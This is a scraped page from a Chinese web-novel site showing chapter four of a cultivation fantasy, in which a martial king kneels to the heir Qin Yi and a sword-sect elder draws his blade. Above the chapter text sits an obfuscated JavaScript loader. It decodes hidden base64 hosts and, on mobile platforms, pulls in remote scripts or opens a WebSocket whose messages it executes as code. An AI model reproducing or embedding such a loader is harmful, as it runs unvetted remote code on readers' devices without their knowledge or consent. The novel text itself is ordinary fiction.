笔趣阁

字:
关灯 护眼
笔趣阁 > 终极狂徒 > 第四章 你也配用剑?
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第四章 你也配用剑?

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
明华殿中,局势剑拔弩张,一触即发。
  就在此时,一道黑色流火,陡然从天穹之上飞射而下。
  强横气息,震慑四方。
  “武王?”
  这一瞬间,所有人都变了脸色。
  能飞天遁地,明显已经超出了大武师的层次,进入了另一层天地。
  “这种时候,怎么还会有陌生的武王来此?”
  是哪一方的人?
  准备插手此事么?
  这一刻,秦震天心中一紧,不敢轻举妄动,只是悄悄的向秦易靠近。
  而那李长老,也皱了皱眉,看向黑色流火降临的地点。
  “哗!”
  黑色的火光散开。
  一个身穿黑袍,披散着头发,背负一柄连鞘长剑,面色漠然的青年男子,大踏步进来。
  “主公。”
  他冲着秦易,抱拳一礼,态度恭敬。
  “嗯。”
  秦易微微颔首。
  早在刚才的那一瞬间,大氪金系统,就向他传递了相关的信息。
  从大氪金系统中,兑换的保镖、奴仆之类,实际上是一些大能者的过去之身复制体。
  一个个,都是至尊天骄、少年大帝,同阶中最强的存在,越级斩杀吃饭喝水般简单。
  也只有这样的存在,才配得上氪金点的珍贵。
  “主公?”
  在场所有人都懵了。
  这可是武王。
  一位堂堂的武王,放在哪里都是一方霸主的存在。
  居然向一个区区的秦家继承人,还是个废人的秦易行礼,恭敬的称呼主公?
  做戏?
  不可能,对方能飞天遁地,那股强大的气息,更是作不了假。
  “易儿……”
  秦震天呆呆的看着这一幕。
  他忽的发现,此时此刻,自己居然看不透,这个在眼皮子底下长大的儿子了。
  “莫非易儿,拜入了什么超级隐秘宗门,或者加入了什么超级隐秘组织?”
  他的脑海中,无穷的疑惑迸发。
  “主公?一位武王境强者,怎么可能叫秦易主公?”
  反应过来后,大长老的面色变了。
  不光是他,所有秦家长老的面色都变了,澹台明月更是变得呆若木鸡,傻傻的看着那黑袍男子。
  武王强者,何等的身份和地位?
  而秦易呢?一个虚有其名的秦家继承人,天生绝脉的废物。
  这简直是天上神龙,听命于地面上的蚂蚁。
  这一幕,彻底令人颠覆了对秦易的印象。
  “原来,这就是你的底牌?”
  灰袍的李长老,深深的看了秦易一眼,缓缓的开口道:
  “的确让我吃了一惊。”
  “堂堂武王,会对你一个小小的秦家嫡子,俯首称臣。”
  “难怪,你敢撕破脸皮,公然违抗我天玄剑宗的意志。”
  “不过,你莫非以为,这就能让你保住性命?”
  话音落下。
  他的身上,陡然爆发出一轮轮灰色的光圈,浩浩荡荡的肃杀气息,横扫四方。
  即便有未知武王插手,他也要悍然动手。
  他有这个自信。
  大晋周遭,但凡实力强横的武王,他没有不知道的,其中绝没有这个黑袍人。
  那就说明,这黑袍人,不是云州本地的武王,而是一些其余小地方的散修。
  他堂堂大晋三大上宗之一的武王境后期剑修,天玄剑宗的长老,还会害怕一个区区武王散修不成?
  “你也是用剑的?”
  灰袍李长老,缓缓拔出腰间的长剑,剑身宛若一泓秋水,森森剑气寒彻入骨。
  “你也配用剑?”
  他面色漠然,看着黑袍人,强横真元源源不绝,催动出恐怖的威力。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师